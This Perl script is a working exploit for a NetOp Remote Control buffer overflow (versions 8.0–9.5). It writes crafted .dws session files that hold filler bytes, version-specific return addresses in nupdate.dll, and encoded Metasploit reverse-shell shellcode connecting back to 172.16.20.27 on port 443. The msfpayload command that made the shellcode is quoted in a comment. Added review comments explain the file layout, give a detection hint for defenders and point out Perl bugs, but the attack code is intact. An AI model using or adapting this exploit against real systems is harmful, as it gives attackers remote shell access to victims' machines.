# Exploit Title: NetOp Remote Control Buffer Overflow
# Date: April 28, 2011
# Author: chap0
# Version: 8.0, 9.1, 9.2, 9.5 (Possibly anything before ver 10)
# Upgrade to Version 10 for fix
# Tested on: Windows XP SP3
#
# Greetz to JJ IE by day Ninja by night, br34dcrumb5, myne-us, Exploit-DB, Corelan
#
#
#!/usr/bin/perl
#
# Overview (review notes):
#   This script writes one crafted ".dws" file per selected NetOp version.
#   The file layout, as built below, is:
#       524 bytes of 0x41 filler  (overruns the vulnerable stack buffer)
#       4-byte return address     (points into nupdate.dll, version-specific)
#       20 bytes of 0x41 filler
#       341 bytes of encoded shellcode (msfencode output quoted below)
#   Mitigation per the header: the vendor fix is NetOp version 10.
#   Detection hint for defenders: a .dws file carrying a run of several
#   hundred 0x41 bytes followed by an address in the 0x20xxxxxx range is
#   not a legitimate session file and should be treated as hostile.
#
# NOTE(review): no `use strict; use warnings;` — $file0..$file3 and $select
# are unscoped package globals.  Left as-is; this is a documentation pass.

# Output file name per supported version (constants, chosen by the menu below).
$file0 = "netop80.dws";
$file1 = "netop91.dws";
$file2 = "netop92.dws";
$file3 = "netop95.dws";

# 524 bytes of padding: fills the buffer up to the saved return address.
my $junk="\x41" x 524;

# Version-specific return addresses inside nupdate.dll (little-endian).
# Per-version because the module's load layout differs between releases.
my $ret0 = "\x9B\xC2\x40\x20"; #0x2040C29B [nupdate.dll]
my $ret1 = "\xB3\xE9\x3D\x20"; #0x203DE9B3 [nupdate.dll]
my $ret2 = "\x1B\xFC\x44\x20"; #0x2044FC1B [nupdate.dll]
my $ret3 = "\x13\x26\xB5\x20"; #0x20B52613 [nupdate.dll]

# 20 bytes of filler between the return address and the shellcode.
my $extra = "\x41" x 20;

# Shellcode as emitted by the command below.  The connect-back destination
# (LHOST/LPORT) is baked into these encoded bytes; bad characters
# \x00 \x0a \x0d were excluded by the encoder.
#./msfpayload windows/shell_reverse_tcp LHOST=172.16.20.27 LPORT=443 R | msfencode -a x86 -b '\x00\x0a\x0d' -t perl
#[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
my $shellcode=
"\xb8\x34\xc1\xf5\xcc\xdb\xd1\xd9\x74\x24\xf4\x5a\x33\xc9" .
"\xb1\x4f\x31\x42\x14\x03\x42\x14\x83\xc2\x04\xd6\x34\x09" .
"\x24\x9f\xb7\xf2\xb5\xff\x3e\x17\x84\x2d\x24\x53\xb5\xe1" .
"\x2e\x31\x36\x8a\x63\xa2\xcd\xfe\xab\xc5\x66\xb4\x8d\xe8" .
"\x77\x79\x12\xa6\xb4\x18\xee\xb5\xe8\xfa\xcf\x75\xfd\xfb" .
"\x08\x6b\x0e\xa9\xc1\xe7\xbd\x5d\x65\xb5\x7d\x5c\xa9\xb1" .
"\x3e\x26\xcc\x06\xca\x9c\xcf\x56\x63\xab\x98\x4e\x0f\xf3" .
"\x38\x6e\xdc\xe0\x05\x39\x69\xd2\xfe\xb8\xbb\x2b\xfe\x8a" .
"\x83\xe7\xc1\x22\x0e\xf6\x06\x84\xf1\x8d\x7c\xf6\x8c\x95" .
"\x46\x84\x4a\x10\x5b\x2e\x18\x82\xbf\xce\xcd\x54\x4b\xdc" .
"\xba\x13\x13\xc1\x3d\xf0\x2f\xfd\xb6\xf7\xff\x77\x8c\xd3" .
"\xdb\xdc\x56\x7a\x7d\xb9\x39\x83\x9d\x65\xe5\x21\xd5\x84" .
"\xf2\x53\xb4\xc0\x37\x69\x47\x11\x50\xfa\x34\x23\xff\x50" .
"\xd3\x0f\x88\x7e\x24\x6f\xa3\xc6\xba\x8e\x4c\x36\x92\x54" .
"\x18\x66\x8c\x7d\x21\xed\x4c\x81\xf4\xa1\x1c\x2d\xa7\x01" .
"\xcd\x8d\x17\xe9\x07\x02\x47\x09\x28\xc8\xfe\x0e\xbf\x5f" .
"\x10\x84\x5b\xc8\x13\xa4\x5a\xb3\x9d\x42\x36\xd3\xcb\xdd" .
"\xaf\x4a\x56\x95\x4e\x92\x4c\x3d\xf2\x01\x0b\xbd\x7d\x3a" .
"\x84\xea\x2a\x8c\xdd\x7e\xc7\xb7\x77\x9c\x1a\x21\xbf\x24" .
"\xc1\x92\x3e\xa5\x84\xaf\x64\xb5\x50\x2f\x21\xe1\x0c\x66" .
"\xff\x5f\xeb\xd0\xb1\x09\xa5\x8f\x1b\xdd\x30\xfc\x9b\x9b" .
"\x3c\x29\x6a\x43\x8c\x84\x2b\x7c\x21\x41\xbc\x05\x5f\xf1" .
"\x43\xdc\xdb\x01\x0e\x7c\x4d\x8a\xd7\x15\xcf\xd7\xe7\xc0" .
"\x0c\xee\x6b\xe0\xec\x15\x73\x81\xe9\x52\x33\x7a\x80\xcb" .
"\xd6\x7c\x37\xeb\xf2";

# Interactive menu: the selection picks which return address / file name pair is used.
print<<EOF;
NetOp Remote Control Buffer Overflow
By chap0 - www.seek-truth.net

Choose a number for the version of NetOp are you attacking:

0 - NetOp 8.0
1 - NetOp 9.1
2 - NetOp 9.2
3 - Netop 9.5

EOF
print "Selection: ";
chomp ($select = <STDIN>);

# NOTE(review): `=~ 0` is a regex match against the pattern /0/, not a numeric
# comparison, so any input containing a "0" (e.g. "10") takes the first branch;
# the same applies to the 1/2/3 branches.  The final `=~ ''` uses an empty
# pattern, which in Perl reuses the last successfully matched pattern rather
# than testing for empty input — confirm intended behaviour before relying on it.
# Each branch writes the same layout (junk . ret . extra . shellcode) with a
# two-arg, bareword, unchecked open(); the file names are fixed constants, so
# there is no mode-injection exposure here, but write failures go unreported.
if ($select =~ 0) {
    print "Creating payload for NetOp 8.0\n";
    my $payload=$junk.$ret0.$extra.$shellcode;
    open(FILE,">$file0");
    print FILE $payload;
    close(FILE);
    print "Done.\n";
}
elsif ($select =~ 1) {
    print "Creating payload for NetOp 9.1\n";
    my $payload=$junk.$ret1.$extra.$shellcode;
    open(FILE,">$file1");
    print FILE $payload;
    close(FILE);
    print "Done.\n";
}
elsif ($select =~ 2) {
    print "Creating payload for NetOp 9.2\n";
    my $payload=$junk.$ret2.$extra.$shellcode;
    open(FILE,">$file2");
    print FILE $payload;
    close(FILE);
    print "Done.\n";
}
elsif ($select =~ 3) {
    print "Creating payload for NetOp 9.5\n";
    my $payload=$junk.$ret3.$extra.$shellcode;
    open(FILE,">$file3");
    print FILE $payload;
    close(FILE);
    print "Done.\n";
}
elsif ($select =~ '') {
    print "Please make a selection.\n";
}